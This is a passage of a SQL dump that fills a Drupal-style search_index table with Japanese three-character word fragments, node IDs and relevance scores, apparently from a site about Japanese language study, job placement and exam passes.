('日本で', 143, 'ja', 'node_search', 1),
('日本で', 144, 'ja', 'node_search', 1),
('日本で', 147, 'ja', 'node_search', 7),
('日本で', 154, 'ja', 'node_search', 1),
('日本で', 155, 'ja', 'node_search', 0.714225),
('日本で', 156, 'ja', 'node_search', 1),
('日本で', 157, 'ja', 'node_search', 1),
('日本で', 160, 'ja', 'node_search', 5.86679),
('日本で', 161, 'ja', 'node_search', 1.91674),
('日本で', 162, 'ja', 'node_search', 1.68961),
('日本で', 163, 'ja', 'node_search', 2),
('日本で', 164, 'ja', 'node_search', 4.91674),
('日本で', 165, 'ja', 'node_search', 1.87313),
('日本で', 166, 'ja', 'node_search', 1.76965),
('日本で', 168, 'ja', 'node_search', 1.75161),
('日本で', 169, 'ja', 'node_search', 4.8249),
('日本で', 170, 'ja', 'node_search', 0.916736),
('日本で', 171, 'ja', 'node_search', 0.934703),
('日本で', 173, 'ja', 'node_search', 0.942091),
('日本で', 174, 'ja', 'node_search', 27.8927),
('日本で', 175, 'ja', 'node_search', 27.9931),
('日本で', 176, 'ja', 'node_search', 1.82138),
('日本で', 177, 'ja', 'node_search', 27.9203),
('日本で', 178, 'ja', 'node_search', 1.92384),
('日本で', 179, 'ja', 'node_search', 0.76188),
('日本で', 180, 'ja', 'node_search', 1.84832),
('日本で', 181, 'ja', 'node_search', 0.961087),
('日本で', 184, 'ja', 'node_search', 1.86995),
('日本で', 185, 'ja', 'node_search', 1.80818),
('日本で', 186, 'ja', 'node_search', 1.89945),
('日本で', 187, 'ja', 'node_search', 0.842342);
INSERT INTO `search_index` (`word`, `sid`, `langcode`, `type`, `score`) VALUES
('日本で', 188, 'ja', 'node_search', 0.805455),
('日本で', 189, 'ja', 'node_search', 0.822065),
('日本で', 190, 'ja', 'node_search', 0.882818),
('日本で', 191, 'ja', 'node_search', 1.83645),
('日本で', 192, 'ja', 'node_search', 1.82206),
('日本で', 193, 'ja', 'node_search', 1.81925),
('日本で', 194, 'ja', 'node_search', 0.860547),
('日本で', 195, 'ja', 'node_search', 0.848323),
('日本で', 196, 'ja', 'node_search', 1.84532),
('日本で', 197, 'ja', 'node_search', 1.88282),
('日本で', 198, 'ja', 'node_search', 1.80545),
('日本で', 199, 'ja', 'node_search', 1.82206),
('日本に', 24, 'ja', 'node_search', 1.23391),
('日本に', 69, 'ja', 'node_search', 0.949597),
('日本に', 87, 'ja', 'node_search', 16),
('日本に', 126, 'ja', 'node_search', 1),
('日本に', 142, 'ja', 'node_search', 0.769219),
('日本の', 23, 'ja', 'node_search', 0.486839),
('日本の', 24, 'ja', 'node_search', 0.776703),
('日本の', 62, 'ja', 'node_search', 1),
('日本の', 69, 'ja', 'node_search', 1),
('日本の', 77, 'ja', 'node_search', 4),
('日本の', 78, 'ja', 'node_search', 1),
('日本の', 80, 'ja', 'node_search', 4),
('日本の', 87, 'ja', 'node_search', 1),
('日本の', 111, 'ja', 'node_search', 1),
('日本の', 122, 'ja', 'node_search', 1),
('日本の', 132, 'ja', 'node_search', 1),
('日本の', 133, 'ja', 'node_search', 1),
('日本の', 134, 'ja', 'node_search', 1),
('日本の', 155, 'ja', 'node_search', 1),
('日本の', 164, 'ja', 'node_search', 1),
('日本の', 166, 'ja', 'node_search', 1),
('日本の', 167, 'ja', 'node_search', 1),
('日本の', 168, 'ja', 'node_search', 1),
('日本の', 169, 'ja', 'node_search', 1),
('日本の', 170, 'ja', 'node_search', 1),
('日本の', 171, 'ja', 'node_search', 1),
('日本の', 173, 'ja', 'node_search', 1),
('日本の', 174, 'ja', 'node_search', 1),
('日本の', 175, 'ja', 'node_search', 1),
('日本の', 176, 'ja', 'node_search', 1),
('日本の', 177, 'ja', 'node_search', 1),
('日本の', 187, 'ja', 'node_search', 1),
('日本の', 188, 'ja', 'node_search', 0.916736),
('日本の', 190, 'ja', 'node_search', 1),
('日本の', 192, 'ja', 'node_search', 1),
('日本の', 194, 'ja', 'node_search', 1),
('日本の', 195, 'ja', 'node_search', 1),
('日本の', 198, 'ja', 'node_search', 1),
('日本へ', 113, 'ja', 'node_search', 1),
('日本へ', 142, 'ja', 'node_search', 0.645209),
('日本へ', 154, 'ja', 'node_search', 1.78178),
('日本へ', 156, 'ja', 'node_search', 28.9384),
('日本へ', 157, 'ja', 'node_search', 28.8335),
('日本へ', 164, 'ja', 'node_search', 1.75231),
('日本へ', 165, 'ja', 'node_search', 1.74996),
('日本へ', 167, 'ja', 'node_search', 1.81645),
('日本へ', 169, 'ja', 'node_search', 1.78691),
('日本へ', 171, 'ja', 'node_search', 1.77419),
('日本へ', 173, 'ja', 'node_search', 1.76188),
('日本へ', 174, 'ja', 'node_search', 1.7185),
('日本へ', 175, 'ja', 'node_search', 1.76431),
('日本へ', 176, 'ja', 'node_search', 1.74069),
('日本へ', 177, 'ja', 'node_search', 1.71),
('日本へ', 184, 'ja', 'node_search', 1.75707),
('日本よ', 27, 'ja', 'node_search', 0.321804),
('日本人', 133, 'ja', 'node_search', 1),
('日本企', 160, 'ja', 'node_search', 0.805455),
('日本企', 179, 'ja', 'node_search', 0.920273),
('日本出', 154, 'ja', 'node_search', 31),
('日本出', 164, 'ja', 'node_search', 27),
('日本出', 165, 'ja', 'node_search', 31),
('日本出', 167, 'ja', 'node_search', 31),
('日本出', 169, 'ja', 'node_search', 27),
('日本出', 171, 'ja', 'node_search', 31),
('日本出', 173, 'ja', 'node_search', 4),
('日本出', 174, 'ja', 'node_search', 4),
('日本出', 175, 'ja', 'node_search', 4),
('日本出', 176, 'ja', 'node_search', 31),
('日本出', 177, 'ja', 'node_search', 4),
('日本出', 184, 'ja', 'node_search', 31),
('日本到', 126, 'ja', 'node_search', 19),
('日本国', 155, 'ja', 'node_search', 0.827757),
('日本就', 161, 'ja', 'node_search', 0.839384),
('日本就', 173, 'ja', 'node_search', 0.78951),
('日本就', 174, 'ja', 'node_search', 0.747619),
('日本就', 175, 'ja', 'node_search', 0.797402),
('日本就', 176, 'ja', 'node_search', 0.766757),
('日本社', 162, 'ja', 'node_search', 0.889397),
('日本語', 23, 'ja', 'node_search', 0.467218),
('日本語', 24, 'ja', 'node_search', 2.78441),
('日本語', 28, 'ja', 'node_search', 3),
('日本語', 62, 'ja', 'node_search', 1.75606),
('日本語', 87, 'ja', 'node_search', 1.70278),
('日本語', 135, 'ja', 'node_search', 1),
('日本語', 136, 'ja', 'node_search', 0.729424),
('日本語', 138, 'ja', 'node_search', 0.802752),
('日本語', 163, 'ja', 'node_search', 0.718502),
('日本語', 173, 'ja', 'node_search', 1),
('日本語', 181, 'ja', 'node_search', 3.7974),
('日本語', 182, 'ja', 'node_search', 7.11552),
('日本語', 183, 'ja', 'node_search', 5.98118),
('日本語', 184, 'ja', 'node_search', 1),
('日無事', 133, 'ja', 'node_search', 0.931053),
('日行わ', 142, 'ja', 'node_search', 1),
('旧問題', 62, 'ja', 'node_search', 0.544759),
('早く検', 28, 'ja', 'node_search', 1),
('早めに', 28, 'ja', 'node_search', 3),
('早めに', 87, 'ja', 'node_search', 0.813674),
('早めに', 163, 'ja', 'node_search', 0.63167),
('旬の食', 122, 'ja', 'node_search', 1),
('明され', 6, 'ja', 'node_search', 3),
('明しま', 29, 'ja', 'node_search', 3),
('明する', 62, 'ja', 'node_search', 0.66666),
('明する', 181, 'ja', 'node_search', 0.997306),
('明する', 182, 'ja', 'node_search', 1),
('明する', 183, 'ja', 'node_search', 1),
('明るい', 167, 'ja', 'node_search', 0.953396),
('明るい', 192, 'ja', 'node_search', 0.802752),
('明書が', 62, 'ja', 'node_search', 0.659351),
('明確で', 87, 'ja', 'node_search', 0.691597),
('星ホテ', 18, 'ja', 'node_search', 28),
('時から', 5, 'ja', 'node_search', 1),
('時から', 163, 'ja', 'node_search', 0.802752),
('時には', 62, 'ja', 'node_search', 0.679856),
('時の付', 162, 'ja', 'node_search', 0.738408),
('時の間', 163, 'ja', 'node_search', 0.792123),
('時まで', 5, 'ja', 'node_search', 1),
('時以降', 5, 'ja', 'node_search', 1),
('時間の', 8, 'ja', 'node_search', 2),
('時間を', 24, 'ja', 'node_search', 0.51578),
('時間を', 77, 'ja', 'node_search', 4),
('時間を', 87, 'ja', 'node_search', 1),
('晴らし', 116, 'ja', 'node_search', 1),
('晴らし', 154, 'ja', 'node_search', 0.916736),
('晴らし', 156, 'ja', 'node_search', 1),
('晴らし', 157, 'ja', 'node_search', 0.942091),
('晴らし', 160, 'ja', 'node_search', 0.961087),
('晴らし', 164, 'ja', 'node_search', 0.989021),
('晴らし', 166, 'ja', 'node_search', 1),
('晴らし', 168, 'ja', 'node_search', 0.860547),
('晴らし', 170, 'ja', 'node_search', 0.869951),
('晴らし', 171, 'ja', 'node_search', 0.997306),
('晴らし', 174, 'ja', 'node_search', 0.827757),
('晴らし', 177, 'ja', 'node_search', 0.993146),
('晴らし', 178, 'ja', 'node_search', 1),
('晴らし', 181, 'ja', 'node_search', 1),
('晴らし', 182, 'ja', 'node_search', 1),
('晴らし', 183, 'ja', 'node_search', 1),
('晴らし', 194, 'ja', 'node_search', 0.931053),
('晴らし', 195, 'ja', 'node_search', 0.927431),
('晴らし', 197, 'ja', 'node_search', 0.923838),
('晴らし', 198, 'ja', 'node_search', 0.882818),
('晴らし', 199, 'ja', 'node_search', 0.794753),
('暇があ', 8, 'ja', 'node_search', 2),
('暢に話', 30, 'ja', 'node_search', 1.84234),
('曜日か', 142, 'ja', 'node_search', 2),
('曜日ま', 142, 'ja', 'node_search', 1),
('書が授', 62, 'ja', 'node_search', 0.657549),
('書付き', 155, 'ja', 'node_search', 0.860547),
('書料金', 62, 'ja', 'node_search', 1.1705),
('最優先', 98, 'ja', 'node_search', 1),
('最初に', 3, 'ja', 'node_search', 1),
('最初の', 69, 'ja', 'node_search', 1),
('最善を', 87, 'ja', 'node_search', 0.703756),
('最大規', 23, 'ja', 'node_search', 1),
('最大限', 116, 'ja', 'node_search', 1),
('最後に', 3, 'ja', 'node_search', 2.90885),
('最新化', 27, 'ja', 'node_search', 0.573154),
('月から', 3, 'ja', 'node_search', 1),
('月以内', 3, 'ja', 'node_search', 0.61241),
('月収は', 163, 'ja', 'node_search', 0.827757),
('月収目', 163, 'ja', 'node_search', 0.863659),
('月曜日', 62, 'ja', 'node_search', 1.19217),
('月曜日', 142, 'ja', 'node_search', 1),
('月曜日', 155, 'ja', 'node_search', 0.909743),
('有名レ', 95, 'ja', 'node_search', 1),
('服する', 62, 'ja', 'node_search', 0.797402),
('服付き', 155, 'ja', 'node_search', 0.854391),
('服装を', 87, 'ja', 'node_search', 0.906287),
('望する', 162, 'ja', 'node_search', 0.683725),
('望んで', 150, 'ja', 'node_search', 1),
('朝の仕', 87, 'ja', 'node_search', 0.776703),
('期にわ', 150, 'ja', 'node_search', 1),
('期待さ', 126, 'ja', 'node_search', 1),
('期待さ', 180, 'ja', 'node_search', 0.902857),
('期待さ', 185, 'ja', 'node_search', 0.857458),
('期待さ', 186, 'ja', 'node_search', 0.934703),
('期待さ', 187, 'ja', 'node_search', 0.892724),
('期待さ', 193, 'ja', 'node_search', 0.892724),
('期待さ', 195, 'ja', 'node_search', 0.953396),
('期待さ', 198, 'ja', 'node_search', 0.906287),
('期待さ', 199, 'ja', 'node_search', 0.873132),
('期待し', 140, 'ja', 'node_search', 0.784336),
('期待し', 182, 'ja', 'node_search', 0.851346),
('期待し', 183, 'ja', 'node_search', 0.781775),
('期待し', 188, 'ja', 'node_search', 0.860547),
('期待し', 197, 'ja', 'node_search', 0.813674),
('期生イ', 122, 'ja', 'node_search', 19),
('期生向', 98, 'ja', 'node_search', 19),
('期的な', 162, 'ja', 'node_search', 1.68961),
('期的に', 142, 'ja', 'node_search', 1),
('期的に', 163, 'ja', 'node_search', 1),
('期間に', 165, 'ja', 'node_search', 1),
('期間を', 27, 'ja', 'node_search', 0.45757),
('期間内', 3, 'ja', 'node_search', 0.588512),
('木曜日', 142, 'ja', 'node_search', 1),
('木曜日', 155, 'ja', 'node_search', 0.906287),
('未来へ', 174, 'ja', 'node_search', 0.927431),
('未来を', 167, 'ja', 'node_search', 0.942091),
('未来を', 192, 'ja', 'node_search', 0.794753),
('本から', 23, 'ja', 'node_search', 0.863659),
('本から', 27, 'ja', 'node_search', 0.302642),
('本での', 115, 'ja', 'node_search', 1),
('本での', 121, 'ja', 'node_search', 1),
('本での', 126, 'ja', 'node_search', 1),
('本での', 140, 'ja', 'node_search', 0.822065),
('本での', 154, 'ja', 'node_search', 1),
('本での', 156, 'ja', 'node_search', 1),
('本での', 157, 'ja', 'node_search', 1),
('本での', 160, 'ja', 'node_search', 4.86679),
('本での', 161, 'ja', 'node_search', 1.91674),
('本での', 164, 'ja', 'node_search', 4.91674),
('本での', 165, 'ja', 'node_search', 1.87313),
('本での', 166, 'ja', 'node_search', 1.76625),
('本での', 168, 'ja', 'node_search', 1.74818),
('本での', 169, 'ja', 'node_search', 4.8249),
('本での', 170, 'ja', 'node_search', 0.913226),
('本での', 171, 'ja', 'node_search', 0.931053),
('本での', 174, 'ja', 'node_search', 27.8927),
('本での', 175, 'ja', 'node_search', 27.9931),
('本での', 176, 'ja', 'node_search', 0.836446),
('本での', 177, 'ja', 'node_search', 27.9203),
('本での', 178, 'ja', 'node_search', 0.923838),
('本での', 179, 'ja', 'node_search', 0.759465),
('本での', 180, 'ja', 'node_search', 0.848323),
('本での', 181, 'ja', 'node_search', 0.957226),
('本での', 185, 'ja', 'node_search', 1.80818),
('本での', 186, 'ja', 'node_search', 0.899454),
('本での', 187, 'ja', 'node_search', 0.839384),
('本での', 188, 'ja', 'node_search', 0.802752),
('本での', 189, 'ja', 'node_search', 0.819249),
('本での', 191, 'ja', 'node_search', 0.836446),
('本での', 192, 'ja', 'node_search', 0.822065),
('本での', 193, 'ja', 'node_search', 1.81925),
('本での', 195, 'ja', 'node_search', 0.845322),
('本での', 196, 'ja', 'node_search', 0.845322),
('本での', 197, 'ja', 'node_search', 1),
('本での', 198, 'ja', 'node_search', 1.80545),
('本での', 199, 'ja', 'node_search', 0.822065),
('本でも', 69, 'ja', 'node_search', 1),
('本でよ', 111, 'ja', 'node_search', 1),
('本で介', 178, 'ja', 'node_search', 1),
('本で働', 143, 'ja', 'node_search', 1),
('本で働', 144, 'ja', 'node_search', 1),
('本で働', 147, 'ja', 'node_search', 7),
('本で働', 155, 'ja', 'node_search', 0.712106),
('本で働', 160, 'ja', 'node_search', 1),
('本で働', 180, 'ja', 'node_search', 1),
('本で働', 184, 'ja', 'node_search', 1),
('本で働', 186, 'ja', 'node_search', 1),
('本で働', 191, 'ja', 'node_search', 1),
('本で働', 192, 'ja', 'node_search', 1),
('本で働', 196, 'ja', 'node_search', 1),
('本で働', 199, 'ja', 'node_search', 1),
('本で多', 173, 'ja', 'node_search', 0.938382),
('本で多', 176, 'ja', 'node_search', 0.980874),
('本で多', 184, 'ja', 'node_search', 0.869951),
('本で多', 190, 'ja', 'node_search', 0.879565),
('本で多', 194, 'ja', 'node_search', 0.857458),
('本で多', 197, 'ja', 'node_search', 0.882818),
('本で安', 163, 'ja', 'node_search', 1),
('本で特', 98, 'ja', 'node_search', 1),
('本で長', 162, 'ja', 'node_search', 1.68961),
('本で長', 163, 'ja', 'node_search', 1),
('本に仕', 87, 'ja', 'node_search', 16),
('本に到', 126, 'ja', 'node_search', 1),
('本に到', 142, 'ja', 'node_search', 0.766757),
('本に実', 24, 'ja', 'node_search', 0.842342),
('本に行', 24, 'ja', 'node_search', 0.388583),
('本に送', 69, 'ja', 'node_search', 0.945829),
('本のホ', 155, 'ja', 'node_search', 1),
('本のレ', 133, 'ja', 'node_search', 1),
('本の介', 169, 'ja', 'node_search', 1),
('本の介', 170, 'ja', 'node_search', 1),
('本の介', 171, 'ja', 'node_search', 1),
('本の介', 188, 'ja', 'node_search', 0.913226),
('本の仕', 87, 'ja', 'node_search', 1),
('本の北', 78, 'ja', 'node_search', 1),
('本の外', 167, 'ja', 'node_search', 1),
('本の外', 173, 'ja', 'node_search', 1),
('本の外', 174, 'ja', 'node_search', 1),
('本の外', 175, 'ja', 'node_search', 1),
('本の外', 176, 'ja', 'node_search', 1),
('本の外', 177, 'ja', 'node_search', 1),
('本の外', 187, 'ja', 'node_search', 1),
('本の外', 190, 'ja', 'node_search', 1),
('本の外', 192, 'ja', 'node_search', 1),
('本の外', 194, 'ja', 'node_search', 1),
('本の外', 195, 'ja', 'node_search', 1),
('本の外', 198, 'ja', 'node_search', 1),
('本の大', 111, 'ja', 'node_search', 1),
('本の宿', 164, 'ja', 'node_search', 1),
('本の宿', 166, 'ja', 'node_search', 1),
('本の宿', 168, 'ja', 'node_search', 1),
('本の就', 132, 'ja', 'node_search', 1),
('本の技', 23, 'ja', 'node_search', 0.485867),
('本の文', 77, 'ja', 'node_search', 4),
('本の文', 122, 'ja', 'node_search', 1),
('本の新', 62, 'ja', 'node_search', 1),
('本の東', 134, 'ja', 'node_search', 1),
('本の福', 80, 'ja', 'node_search', 4),
('本の秋', 69, 'ja', 'node_search', 1),
('本の習', 24, 'ja', 'node_search', 0.774192),
('本への', 113, 'ja', 'node_search', 1),
('本への', 142, 'ja', 'node_search', 0.643484),
('本へ出', 154, 'ja', 'node_search', 1.78178),
('本へ出', 156, 'ja', 'node_search', 27.9384),
('本へ出', 157, 'ja', 'node_search', 27.8335),
('本へ出', 164, 'ja', 'node_search', 1.75231),
('本へ出', 165, 'ja', 'node_search', 1.74996),
('本へ出', 167, 'ja', 'node_search', 1.81645),
('本へ出', 169, 'ja', 'node_search', 1.78691),
('本へ出', 171, 'ja', 'node_search', 1.77419),
('本へ出', 173, 'ja', 'node_search', 1.76188),
('本へ出', 174, 'ja', 'node_search', 1.7185),
('本へ出', 175, 'ja', 'node_search', 1.76431),
('本へ出', 176, 'ja', 'node_search', 1.74069),
('本へ出', 177, 'ja', 'node_search', 1.71),
('本へ出', 184, 'ja', 'node_search', 1.75707),
('本へ向', 156, 'ja', 'node_search', 1),
('本へ向', 157, 'ja', 'node_search', 1),
('本より', 27, 'ja', 'node_search', 0.321388),
('本コー', 155, 'ja', 'node_search', 1.79475),
('本人に', 164, 'ja', 'node_search', 1),
('本人に', 171, 'ja', 'node_search', 1),
('本人に', 174, 'ja', 'node_search', 1),
('本人に', 177, 'ja', 'node_search', 1),
('本人の', 133, 'ja', 'node_search', 1),
('本人の', 160, 'ja', 'node_search', 1),
('本人の', 161, 'ja', 'node_search', 1),
('本人の', 166, 'ja', 'node_search', 1),
('本人の', 168, 'ja', 'node_search', 1),
('本人の', 170, 'ja', 'node_search', 1),
('本人の', 179, 'ja', 'node_search', 1),
('本人の', 180, 'ja', 'node_search', 1),
('本人の', 185, 'ja', 'node_search', 1),
('本人の', 186, 'ja', 'node_search', 1),
('本人の', 188, 'ja', 'node_search', 1),
('本人の', 191, 'ja', 'node_search', 1),
('本人の', 192, 'ja', 'node_search', 1),
('本人の', 193, 'ja', 'node_search', 1),
('本人の', 194, 'ja', 'node_search', 1),
('本人の', 195, 'ja', 'node_search', 1),
('本人の', 196, 'ja', 'node_search', 1),
('本人の', 197, 'ja', 'node_search', 1),
('本人の', 198, 'ja', 'node_search', 1),
('本人の', 199, 'ja', 'node_search', 1),
('本企業', 160, 'ja', 'node_search', 0.802752),
('本企業', 179, 'ja', 'node_search', 0.916736),
('本出発', 154, 'ja', 'node_search', 31),
('本出発', 164, 'ja', 'node_search', 27),
('本出発', 165, 'ja', 'node_search', 31),
('本出発', 167, 'ja', 'node_search', 31),
('本出発', 169, 'ja', 'node_search', 27),
('本出発', 171, 'ja', 'node_search', 31),
('本出発', 173, 'ja', 'node_search', 4),
('本出発', 174, 'ja', 'node_search', 4),
('本出発', 175, 'ja', 'node_search', 4),
('本出発', 176, 'ja', 'node_search', 31),
('本出発', 177, 'ja', 'node_search', 4),
('本出発', 184, 'ja', 'node_search', 31),
('本到着', 126, 'ja', 'node_search', 19),
('本国内', 155, 'ja', 'node_search', 0.824901),
('本就職', 161, 'ja', 'node_search', 0.836446),
('本就職', 173, 'ja', 'node_search', 0.786915),
('本就職', 174, 'ja', 'node_search', 0.745294),
('本就職', 175, 'ja', 'node_search', 0.794753),
('本就職', 176, 'ja', 'node_search', 0.76431),
('本日無', 133, 'ja', 'node_search', 0.934703),
('本気で', 135, 'ja', 'node_search', 1),
('本求人', 162, 'ja', 'node_search', 1),
('本社会', 162, 'ja', 'node_search', 0.886095),
('本語の', 24, 'ja', 'node_search', 0.35705),
('本語の', 87, 'ja', 'node_search', 0.845322),
('本語の', 138, 'ja', 'node_search', 0.800068),
('本語を', 24, 'ja', 'node_search', 0.399972),
('本語を', 87, 'ja', 'node_search', 0.854391),
('本語ク', 24, 'ja', 'node_search', 0.391679),
('本語コ', 28, 'ja', 'node_search', 3),
('本語チ', 62, 'ja', 'node_search', 0.58995),
('本語学', 24, 'ja', 'node_search', 0.902857),
('本語学', 173, 'ja', 'node_search', 1),
('本語学', 181, 'ja', 'node_search', 1.7974),
('本語学', 182, 'ja', 'node_search', 4.2327),
('本語学', 183, 'ja', 'node_search', 3.98118),
('本語学', 184, 'ja', 'node_search', 1),
('本語教', 135, 'ja', 'node_search', 1),
('本語能', 23, 'ja', 'node_search', 0.466323),
('本語能', 24, 'ja', 'node_search', 0.729424),
('本語能', 62, 'ja', 'node_search', 0.571798),
('本語能', 136, 'ja', 'node_search', 0.727213),
('本語能', 163, 'ja', 'node_search', 0.716357),
('本語能', 181, 'ja', 'node_search', 2),
('本語能', 182, 'ja', 'node_search', 2.88282),
('本語能', 183, 'ja', 'node_search', 2),
('材とし', 154, 'ja', 'node_search', 0.899454),
('材とし', 170, 'ja', 'node_search', 0.836446),
('材と日', 160, 'ja', 'node_search', 0.808176),
('材と日', 179, 'ja', 'node_search', 0.927431),
('材によ', 27, 'ja', 'node_search', 0.562486),
('材の日', 173, 'ja', 'node_search', 0.794753),
('材の日', 174, 'ja', 'node_search', 0.752312),
('材の日', 175, 'ja', 'node_search', 0.802752),
('材の日', 176, 'ja', 'node_search', 0.771698),
('材の海', 154, 'ja', 'node_search', 0.822065),
('材の海', 164, 'ja', 'node_search', 0.784336),
('材の海', 165, 'ja', 'node_search', 0.781775),
('材の海', 167, 'ja', 'node_search', 0.854391),
('材の皆', 162, 'ja', 'node_search', 1),
('材の育', 161, 'ja', 'node_search', 0.851346),
('材の重', 122, 'ja', 'node_search', 1),
('材を募', 163, 'ja', 'node_search', 1),
('材紹介', 23, 'ja', 'node_search', 0.662985),
('来た民', 23, 'ja', 'node_search', 0.62674),
('来て溶', 6, 'ja', 'node_search', 3),
('来に向', 195, 'ja', 'node_search', 1),
('来のさ', 183, 'ja', 'node_search', 0.949597),
('来の可', 196, 'ja', 'node_search', 1),
('来の進', 182, 'ja', 'node_search', 0.989021),
('来への', 174, 'ja', 'node_search', 0.923838),
('来への', 197, 'ja', 'node_search', 1),
('来られ', 19, 'ja', 'node_search', 2),
('来ると', 87, 'ja', 'node_search', 16),
('来をお', 192, 'ja', 'node_search', 0.792123),
('来を築', 167, 'ja', 'node_search', 0.938382),
('来サー', 23, 'ja', 'node_search', 1),
('東京で', 113, 'ja', 'node_search', 1),
('東京の', 77, 'ja', 'node_search', 4),
('東京へ', 73, 'ja', 'node_search', 1),
('東京市', 134, 'ja', 'node_search', 1),
('東京市', 144, 'ja', 'node_search', 1),
('果が得', 29, 'ja', 'node_search', 3),
('果たし', 80, 'ja', 'node_search', 1),
('果であ', 160, 'ja', 'node_search', 1),
('果であ', 161, 'ja', 'node_search', 1),
('果であ', 168, 'ja', 'node_search', 1),
('果であ', 170, 'ja', 'node_search', 1),
('果であ', 179, 'ja', 'node_search', 1),
('果であ', 180, 'ja', 'node_search', 1),
('果であ', 181, 'ja', 'node_search', 0.968904),
('果であ', 188, 'ja', 'node_search', 1),
('果であ', 193, 'ja', 'node_search', 1),
('果であ', 196, 'ja', 'node_search', 1),
('果であ', 198, 'ja', 'node_search', 1),
('果であ', 199, 'ja', 'node_search', 1),
('果です', 166, 'ja', 'node_search', 1),
('果です', 186, 'ja', 'node_search', 1),
('果です', 189, 'ja', 'node_search', 1),
('果です', 190, 'ja', 'node_search', 1),
('果です', 191, 'ja', 'node_search', 1),
('果です', 192, 'ja', 'node_search', 1),
('果です', 195, 'ja', 'node_search', 1),
('果です', 197, 'ja', 'node_search', 1),
('果とな', 165, 'ja', 'node_search', 0.953396),
('果につ', 178, 'ja', 'node_search', 0.980874),
('果につ', 189, 'ja', 'node_search', 0.882818),
('果につ', 194, 'ja', 'node_search', 0.913226),
('果につ', 197, 'ja', 'node_search', 0.906287),
('果のご', 182, 'ja', 'node_search', 27),
('果をご', 179, 'ja', 'node_search', 1),
('果を心', 160, 'ja', 'node_search', 0.942091),
('果を心', 166, 'ja', 'node_search', 0.98493),
('果を心', 195, 'ja', 'node_search', 0.909743),
('果を心', 198, 'ja', 'node_search', 0.866793),
('果を活', 176, 'ja', 'node_search', 0.997306),
('果を称', 140, 'ja', 'node_search', 1),
('果を証', 62, 'ja', 'node_search', 0.672252),
('果を達', 181, 'ja', 'node_search', 1),
('果を達', 182, 'ja', 'node_search', 1),
('果を達', 183, 'ja', 'node_search', 1),
('果的な', 28, 'ja', 'node_search', 1),
('架け橋', 160, 'ja', 'node_search', 0.784336),
('架け橋', 179, 'ja', 'node_search', 0.886095),
('校で学', 181, 'ja', 'node_search', 0.794753),
('校で学', 182, 'ja', 'node_search', 0.805455),
('校で学', 183, 'ja', 'node_search', 0.742984),
('校との', 24, 'ja', 'node_search', 0.714662),
('校の設', 27, 'ja', 'node_search', 0.539902),
('校は当', 142, 'ja', 'node_search', 0.902857),
('校も開', 24, 'ja', 'node_search', 0.938382),
('校を視', 9, 'ja', 'node_search', 3),
('校を視', 17, 'ja', 'node_search', 4),
('校卒業', 24, 'ja', 'node_search', 0.37784),
('株式会', 9, 'ja', 'node_search', 28),
('株式会', 11, 'ja', 'node_search', 19),
('株式会', 17, 'ja', 'node_search', 30),
('株式会', 19, 'ja', 'node_search', 1),
('株式会', 23, 'ja', 'node_search', 3.1674),
('株式会', 27, 'ja', 'node_search', 19.9774),
('株式会', 62, 'ja', 'node_search', 0.784336),
('格おめ', 85, 'ja', 'node_search', 4),
('格おめ', 101, 'ja', 'node_search', 4),
('格おめ', 102, 'ja', 'node_search', 1),
('格おめ', 104, 'ja', 'node_search', 7),
('格おめ', 106, 'ja', 'node_search', 1),
('格おめ', 110, 'ja', 'node_search', 1),
('格おめ', 118, 'ja', 'node_search', 1),
('格おめ', 119, 'ja', 'node_search', 1),
('格おめ', 124, 'ja', 'node_search', 1),
('格おめ', 146, 'ja', 'node_search', 20),
('格おめ', 181, 'ja', 'node_search', 4),
('格され', 160, 'ja', 'node_search', 1.74762),
('格され', 161, 'ja', 'node_search', 1.74996),
('格され', 166, 'ja', 'node_search', 1.7717),
('格され', 168, 'ja', 'node_search', 1.75946),
('格され', 170, 'ja', 'node_search', 1.74529),
('格され', 178, 'ja', 'node_search', 1.78178),
('格され', 179, 'ja', 'node_search', 1.73165),
('格され', 180, 'ja', 'node_search', 1.80007),
('格され', 181, 'ja', 'node_search', 1.78178),
('格され', 182, 'ja', 'node_search', 1.79212),
('格され', 183, 'ja', 'node_search', 1.73165),
('格され', 185, 'ja', 'node_search', 1.75231),
('格され', 186, 'ja', 'node_search', 1.76922),
('格され', 187, 'ja', 'node_search', 1.74069),
('格され', 188, 'ja', 'node_search', 1.76188),
('格され', 189, 'ja', 'node_search', 1.74996),
('格され', 190, 'ja', 'node_search', 1.76922),
('格され', 191, 'ja', 'node_search', 1.80818),
('格され', 192, 'ja', 'node_search', 1.77923),
('格され', 193, 'ja', 'node_search', 1.79475),
('格され', 194, 'ja', 'node_search', 1.75231),
('格され', 195, 'ja', 'node_search', 1.80545),
('格され', 196, 'ja', 'node_search', 1.7974),
('格され', 197, 'ja', 'node_search', 1.76922),
('格され', 198, 'ja', 'node_search', 1.78178),
('格され', 199, 'ja', 'node_search', 1.75468),
('格した', 23, 'ja', 'node_search', 0.45757),
('格した', 70, 'ja', 'node_search', 1),
('格した', 71, 'ja', 'node_search', 1),
('格した', 72, 'ja', 'node_search', 1),
('格した', 74, 'ja', 'node_search', 1),
('格した', 75, 'ja', 'node_search', 1),
('格した', 82, 'ja', 'node_search', 1),
('格した', 84, 'ja', 'node_search', 1),
('格した', 90, 'ja', 'node_search', 1),
('格した', 133, 'ja', 'node_search', 0.774192),
('格した', 135, 'ja', 'node_search', 1),
('格した', 136, 'ja', 'node_search', 2),
('格した', 140, 'ja', 'node_search', 1),
('格しま', 81, 'ja', 'node_search', 1),
('格しま', 100, 'ja', 'node_search', 4),
('格しま', 107, 'ja', 'node_search', 1),
('格しま', 109, 'ja', 'node_search', 1),
('格しま', 112, 'ja', 'node_search', 1),
('格しま', 114, 'ja', 'node_search', 1),
('格しま', 115, 'ja', 'node_search', 1),
('格しま', 117, 'ja', 'node_search', 1),
('格しま', 121, 'ja', 'node_search', 1),
('格しま', 123, 'ja', 'node_search', 1),
('格しま', 125, 'ja', 'node_search', 1),
('格しま', 131, 'ja', 'node_search', 1),
('格しま', 132, 'ja', 'node_search', 1),
('格しま', 134, 'ja', 'node_search', 1),
('格しま', 137, 'ja', 'node_search', 1),
('格しま', 139, 'ja', 'node_search', 1),
('格しま', 141, 'ja', 'node_search', 1),
('格しま', 143, 'ja', 'node_search', 1),
('格する', 98, 'ja', 'node_search', 1),
('格する', 138, 'ja', 'node_search', 0.98493),
('格でき', 62, 'ja', 'node_search', 0.547222),
('格でも', 183, 'ja', 'node_search', 0.892724),
('格で日', 156, 'ja', 'node_search', 1),
('格で日', 157, 'ja', 'node_search', 1),
('格によ', 183, 'ja', 'node_search', 27),
('格によ', 190, 'ja', 'node_search', 1),
